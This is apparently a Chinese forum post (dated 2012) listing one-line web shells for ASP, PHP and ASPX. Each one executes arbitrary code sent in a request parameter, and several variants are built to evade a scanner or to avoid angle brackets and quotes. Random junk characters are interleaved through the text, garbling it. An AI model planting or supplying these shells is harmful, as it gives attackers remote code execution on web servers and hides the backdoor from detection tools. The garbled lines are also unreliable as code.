asp一句话 <%execute(request("1"))%>
3 t4 O' p. c; |0 e/ q Y9 T8 y/ N% c/ h0 Z/ L% y% o" S+ i- a a
php一句话 <?php eval($_POST[1]);?>
5 D4 A7 D# r! A0 U8 I3 x: M# i
$ T3 u: S- L1 k; @aspx一句话) |% |# T1 X1 q+ e' Y" i' n- p
+ ^' e! I# F/ I {
<script language="C#" runat="server">
2 O3 n: z) P/ a6 u6 R$ `4 `% _1 A+ b6 f; F6 n. g& T8 h
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");" O0 W# S5 ?4 J# ~1 K6 u+ n
! L* u3 q6 h) R( J
</script>; n2 `0 C4 y. ]& ]
# ]" c4 Q/ L) f0 w5 G
可以躲过雷客图的一句话。
$ X4 t) \% Z/ w6 G0 h+ l2 o! L p
8 b) j! Q# C$ Y9 `! f. { r& \: F <%
6 b4 z6 D) d- Q9 q6 V& D! t5 W/ m+ {4 o8 k! Y" g3 ~6 t
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")+ V; O0 W D% N" i( V
4 \7 ^: Q( V' W ms.Language="VBScript"
, G% G1 R( Y- b5 a4 C, T1 z f8 @/ |+ ?
ms.AddObject "Response", Response
0 ~& Q/ c( j g6 J- \" R/ K$ b( _- A( o% ~! Q
ms.AddObject "request", request& t4 e- a; Q2 T; S
+ O& |; Y4 W: T ms.ExecuteStatement("ev"&"al(request(""1""))")( K1 x1 \5 N* m: {
% ?/ |' j, a E: }4 ~# p
%>
/ l$ q1 |' `/ v5 k7 }6 v
0 k$ ~1 w, A6 o/ C. ]* U) S2 Z 不用'<,>'的asp一句话
3 b* Z' s" J* O6 J& d0 y) E$ M x( z" }/ a; p% M; g
<script language=VBScript runat=server>execute request("1")</script>
) c' ? }% }, j3 Z/ `2 w2 i- \8 `
不用双引号的一句话。
2 T8 A$ C* ~" d4 V6 `+ Q# ~- i* V5 i5 J- f# }0 s
<%eval request(chr(35))%>
5 F, D0 ~: g. _5 |3 q |
发表于 2012-9-23 14:36:09
收藏
支持
反对